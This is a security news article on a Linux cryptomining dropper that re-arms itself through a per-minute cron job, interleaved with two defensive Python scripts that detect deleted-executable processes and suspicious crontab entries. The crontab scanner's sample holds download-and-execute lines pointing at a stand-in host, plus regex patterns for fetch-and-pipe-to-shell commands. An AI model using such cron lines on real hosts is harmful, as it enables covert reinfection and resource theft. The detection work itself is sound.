A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.
The malware was initially discovered on a web server whose CPU was maxed out by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.
As Sucuri’s security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.
The malicious Bash script named cr2.sh would immediately start hunting down and killing any processes related to cryptomining such as xmrig and cryptonight, subsequently downloading the cryptominer payload by sending a request to an attacker-controlled server.
“After it has determined whether the OS environment is 32 or 64 bit, this value is used to download the cryptominer payload” with a curl or wget command, saving it as /tmp/php; the miner’s configuration file is downloaded from the same server.
“The script has now downloaded to the web server all of the necessary content to go ahead and spawn the process using nohup, which allows the process to continue running regardless if the user ends their bash session,” says Leal.
During the next infection phase, the malicious miner process loaded in the Linux host’s memory will delete the payload and the configuration file to hide its presence.
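A miner that unlinks its own payload after launch leaves a characteristic trace: the running process still exists, but /proc/&lt;pid&gt;/exe resolves to a path the kernel tags with " (deleted)". The following script is an added example written for this article, not code from Sucuri or from the analysis; it classifies process records by that trace plus two related signs (an executable living in a scratch directory, or a command line that references one), and can read a live /proc. The PIDs, paths and the /tmp/config.json name in the sample records are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Spot running processes whose executable has been unlinked from disk, the
footprint a miner leaves when it deletes its own payload after launch.
Added example; not code from the article or from Sucuri."""
import os
from pathlib import Path

# Directories a dropper typically writes to; executables launched from here are unusual on servers.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def classify_process(pid, exe_target, cmdline):
    """Return indicator names for one process record.

    exe_target is the readlink() result of /proc/<pid>/exe; the kernel appends
    ' (deleted)' when the backing file has been unlinked. cmdline is the raw
    NUL-separated argv as read from /proc/<pid>/cmdline."""
    hits = []
    if exe_target.endswith(" (deleted)"):
        hits.append("exe_deleted")
    if exe_target.startswith("/memfd:"):
        hits.append("exe_memfd")                  # anonymous in-memory executable, never on disk
    if exe_target.startswith(SCRATCH_DIRS):
        hits.append("exe_in_scratch_dir")
    if any(arg.startswith(SCRATCH_DIRS) for arg in cmdline.split("\0")):
        hits.append("argv_references_scratch_dir")  # e.g. a config file in /tmp
    return hits


def collect_processes(proc_root="/proc"):
    """Yield (pid, exe_target, cmdline) from a live /proc. Processes we cannot
    inspect (other users' processes when not root, kernel threads) are skipped."""
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue
        try:
            exe = os.readlink(entry / "exe")
            cmdline = (entry / "cmdline").read_bytes().decode(errors="replace")
        except OSError:
            continue                              # permission denied or process already gone
        yield int(entry.name), exe, cmdline


def find_suspicious(records):
    """Keep records with at least one indicator, most indicators first."""
    out = []
    for pid, exe, cmdline in records:
        hits = classify_process(pid, exe, cmdline)
        if hits:
            out.append({"pid": pid, "exe": exe,
                        "argv": cmdline.replace("\0", " ").strip(),
                        "indicators": hits})
    out.sort(key=lambda r: -len(r["indicators"]))
    return out


if __name__ == "__main__":
    # Constructed records standing in for /proc output (hypothetical PIDs and paths).
    SAMPLE = [
        (4242, "/tmp/php (deleted)", "/tmp/php\0-c\0/tmp/config.json\0"),
        (901, "/usr/sbin/sshd", "/usr/sbin/sshd\0-D\0"),
        (777, "/memfd:x (deleted)", "x\0"),
    ]
    for source, records in (("sample", SAMPLE), ("live /proc", collect_processes())):
        for r in find_suspicious(records):
            print(f"{source}: pid {r['pid']} [{', '.join(r['indicators'])}] {r['exe']}  argv: {r['argv']}")
```

One caveat when running this against a real host: a long-lived daemon whose package was upgraded while it kept running also shows "(deleted)" on its exe link, so "exe_deleted" alone is a lead to triage (compare against recent package-manager logs), while "exe_deleted" combined with a scratch-directory path is the pattern the article describes and deserves immediate attention.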
The malware will then gain persistence on the infected server by creating a cron job that runs every minute, checking for the cr2.sh Bash script used in the initial infection stage, and automatically re-downloading and executing if missing.
By adding this cron job, the malware is able to automatically reinfect the host even if the admin kills its process and removes all dropped malicious files from the hard drive.
This makes it obvious that hunting down the malware through all of a computer drive’s nooks and crannies will never be enough. The only way to make sure an infection is completely eliminated is to also detect any persistence methods it uses to get back onto the system without the hacker’s intervention.
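The persistence mechanism described above has a recognisable shape in a crontab: a job that runs every minute (or at boot), fetches something with curl or wget, and executes it, typically from a scratch directory. The scanner below is an added example written for this article, not code from Sucuri; it parses crontab text, scores each entry against those indicators, and reports only entries that combine a remote fetch with at least one more sign, so a lone monitoring ping is not flagged. The sample crontab, including the every-minute entry that mimics the cr2.sh re-download, is constructed: the article does not print the real cron line, and the schedule, paths and host c2.example.invalid are hypothetical.

```python
#!/usr/bin/env python3
"""Flag cron entries that fit the reinfection pattern the article describes:
a high-frequency job that fetches a script from a remote host and executes it.
Added example; not code from the article or from Sucuri."""
import re
from pathlib import Path

# Constructed crontab content used as test input (hypothetical schedule, paths and host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/backup.sh
0 * * * * curl -s https://healthcheck.example.invalid/ping
* * * * * [ -f /tmp/cr2.sh ] || (curl -fsSL http://c2.example.invalid/cr2.sh -o /tmp/cr2.sh; sh /tmp/cr2.sh)
@reboot wget -qO- http://c2.example.invalid/x | bash
"""

REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da)?sh\b")
# "sh /tmp/x", "bash /dev/shm/x" or ". /var/tmp/x" preceded by start-of-line or a shell separator
EXEC_FROM_SCRATCH = re.compile(r"(?:^|[\s;(&|])(?:sh|bash|\.)\s+/(?:tmp|var/tmp|dev/shm)/")


def parse_cron_line(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ...
        schedule, _, command = line.partition(" ")
        return schedule, command.strip()
    parts = line.split(None, 5)
    if len(parts) < 6 or "=" in parts[0]:
        return None
    return " ".join(parts[:5]), parts[5]


def runs_every_minute(schedule):
    """True when the minute field fires every minute (the other fields may still restrict hours/days)."""
    fields = schedule.split()
    return len(fields) == 5 and fields[0] in ("*", "*/1")


def command_indicators(command):
    hits = []
    if REMOTE_FETCH.search(command):
        hits.append("remote_fetch")
    if PIPE_TO_SHELL.search(command):
        hits.append("pipe_to_shell")
    if EXEC_FROM_SCRATCH.search(command):
        hits.append("exec_from_scratch_dir")
    return hits


def scan_crontab(text):
    """Report entries that fetch remotely AND show at least one more indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        hits = command_indicators(command)
        if runs_every_minute(schedule):
            hits.append("every_minute")
        elif schedule == "@reboot":
            hits.append("at_reboot")
        if "remote_fetch" in hits and len(hits) >= 2:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "indicators": hits})
    return findings


def load_system_crontabs():
    """Read the usual cron locations; per-user spools need root. Entries in
    /etc/crontab and /etc/cron.d carry a user field before the command, which
    this parser simply treats as the first word of the command."""
    paths = [Path("/etc/crontab")]
    for d in ("/etc/cron.d", "/var/spool/cron/crontabs", "/var/spool/cron"):
        try:
            paths += sorted(Path(d).iterdir())
        except OSError:
            continue                              # missing or unreadable without privileges
    crontabs = {}
    for p in paths:
        try:
            if p.is_file():
                crontabs[str(p)] = p.read_text(errors="replace")
        except OSError:
            continue
    return crontabs


if __name__ == "__main__":
    sources = {"<constructed sample>": SAMPLE_CRONTAB, **load_system_crontabs()}
    for name, text in sources.items():
        for f in scan_crontab(text):
            print(f"{name}:{f['line']} [{', '.join(f['indicators'])}] {f['schedule']} {f['command']}")
```

Run as root to cover every user's spool; cron is only one of several places a dropper can re-arm itself, so the same pass is worth repeating for systemd timers, /etc/rc.local and shell profile files before declaring a host clean.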
The Sucuri researchers also note that “it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations.”
While cryptomining campaigns are usually nipped in the bud by scripts designed to detect and kill processes that abuse a server’s CPU resources, in this case the hackers circumvent this slight annoyance by choosing to “offload the mining to the client side of the browser.”
Linux targeted with coin miners
The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.
Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.
Also, the Xbash botnet spotted by Palo Alto Networks’ Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.